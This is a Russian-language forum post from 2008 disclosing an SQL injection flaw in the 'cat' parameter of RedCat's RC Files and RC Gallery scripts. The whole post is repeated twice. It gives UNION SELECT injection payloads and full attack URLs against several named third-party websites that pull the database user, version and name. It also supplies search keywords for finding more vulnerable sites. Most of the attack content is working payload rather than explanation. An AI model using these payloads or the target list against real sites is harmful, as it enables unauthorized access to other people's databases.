Серенький
02.02.2008, 18:01
Нашел банальную уязвимость в скрипте RC Files v1.0 от RedCat'a, но оказалось, что дырка эта присутствует и в другой его наработке, RC Gallery, причем кочует из версии к версии.
-------------------------------------
RC Files v1.0 | Powered by RedCat | ©2004-2008
-------------------------------------
Уязвимость присутствует из-за отсутствия фильтрации в параметре cat, что позволяет сформировать свой целевой запрос.
cat=-1+union+select+1,2,3,4,5,6,7,8,9,0/*
гуглим, видим:
http://www.kfmgtu.ru/download/?cat=-3+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6,7,8,9,0/*http://www.legalref.ru/rc/?cat=-7+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9,0/* ...
Уязвима также и версия 1.1, уязвимость аналогичная
Более распространенный скрипт RC Gallery имеет аналогичную ошибку:
-------------------------------------
RC Gallery v(<=)2.3 | Powered by RedCat | ©2004-2008
-------------------------------------
Уязвимость присутствует в параметре cat. Позволяет нам составить целевой запрос.
имеем
http://www.beeland.ru/pc/index.php?page=1&vtype=big&cat=-1+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6/* http://www.space-studio.ru/gallery/?cat=-2+union+select+1,2,3,4,user(),6,7/* http://www.suv4x4.ru/gallery/?cat=-1+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6/* ...
в версии 2.4 узвимость устранена.
keywords : RC Gallery v2.3 (2.1,1,1..), RC Files v1.1, Powered by RedCat
-------------------------------------
RC Files v1.0 | Powered by RedCat | ©2004-2008
-------------------------------------
Уязвимость присутствует из-за отсутствия фильтрации в параметре cat, что позволяет сформировать свой целевой запрос.
cat=-1+union+select+1,2,3,4,5,6,7,8,9,0/*
гуглим, видим:
http://www.kfmgtu.ru/download/?cat=-3+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6,7,8,9,0/*http://www.legalref.ru/rc/?cat=-7+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9,0/* ...
Уязвима также и версия 1.1, уязвимость аналогичная
Более распространенный скрипт RC Gallery имеет аналогичную ошибку:
-------------------------------------
RC Gallery v(<=)2.3 | Powered by RedCat | ©2004-2008
-------------------------------------
Уязвимость присутствует в параметре cat. Позволяет нам составить целевой запрос.
имеем
http://www.beeland.ru/pc/index.php?page=1&vtype=big&cat=-1+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6/* http://www.space-studio.ru/gallery/?cat=-2+union+select+1,2,3,4,user(),6,7/* http://www.suv4x4.ru/gallery/?cat=-1+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6/* ...
в версии 2.4 узвимость устранена.
keywords : RC Gallery v2.3 (2.1,1,1..), RC Files v1.1, Powered by RedCat